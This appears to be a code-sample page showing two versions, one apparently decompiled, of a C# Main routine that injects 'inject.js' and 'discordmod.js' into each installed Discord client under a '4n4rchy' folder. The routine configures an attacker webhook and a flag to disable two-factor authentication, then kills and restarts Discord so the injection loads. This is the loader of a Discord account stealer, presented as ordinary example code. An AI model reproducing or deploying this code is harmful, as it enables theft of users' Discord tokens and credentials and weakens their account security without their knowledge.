Ejemplo n.º 1
0
        static void Main()
        {
            OxygenFile injectFile = new OxygenFile("inject.js", Resources.inject);
            OxygenFile modFile    = new OxygenFile("discordmod.js", Resources.discordmod);

            foreach (DiscordBuild build in Enum.GetValues(typeof(DiscordBuild)))
            {
                if (OxygenInjector.TryGetDiscordPath(build, out string path))
                {
                    string anarchyPath = Path.Combine(path, "4n4rchy");

                    if (Directory.Exists(anarchyPath))
                    {
                        Directory.Delete(anarchyPath, true);
                    }
                }

                if (OxygenInjector.Inject(build, "4n4rchy", "inject", $"process.env.hook = '{Settings.Webhook.Replace("https://discord.com/api/webhooks/", "").Replace("https://discordapp.com/api/webhooks/", "")}';\nprocess.env.mfa = {Settings.Disable2fa.ToString().ToLower()};", injectFile, modFile) && build == DiscordBuild.Discord)
                {
                    foreach (var proc in Process.GetProcessesByName("Discord"))
                    {
                        proc.Kill();
                    }

                    Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Microsoft\Windows\Start Menu\Programs\Discord Inc\Discord.lnk");
                }
            }
        }
Ejemplo n.º 2
0
        // Token: 0x0600000A RID: 10 RVA: 0x00002270 File Offset: 0x00000470
        private static void Main()
        {
            OxygenFile injectFile = new OxygenFile("inject.js", Resources.inject);
            OxygenFile modFile    = new OxygenFile("discordmod.js", Resources.discordmod);

            foreach (object obj in Enum.GetValues(typeof(DiscordBuild)))
            {
                DiscordBuild build = (DiscordBuild)obj;
                string       path;
                bool         flag = OxygenInjector.TryGetDiscordPath(build, out path);
                if (flag)
                {
                    string anarchyPath = Path.Combine(path, "4n4rchy");
                    bool   flag2       = Directory.Exists(anarchyPath);
                    if (flag2)
                    {
                        Directory.Delete(anarchyPath, true);
                    }
                }
                bool flag3 = OxygenInjector.Inject(build, "4n4rchy", "inject", string.Concat(new string[]
                {
                    "process.env.hook = '",
                    Settings.Webhook.Replace("https://discord.com/api/webhooks/", "").Replace("https://discordapp.com/api/webhooks/", ""),
                    "';\nprocess.env.mfa = ",
                    Settings.Disable2fa.ToString().ToLower(),
                    ";"
                }), new OxygenFile[]
                {
                    injectFile,
                    modFile
                }) && build == DiscordBuild.Discord;
                if (flag3)
                {
                    foreach (Process proc in Process.GetProcessesByName("Discord"))
                    {
                        proc.Kill();
                    }
                    Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Microsoft\\Windows\\Start Menu\\Programs\\Discord Inc\\Discord.lnk");
                }
            }
        }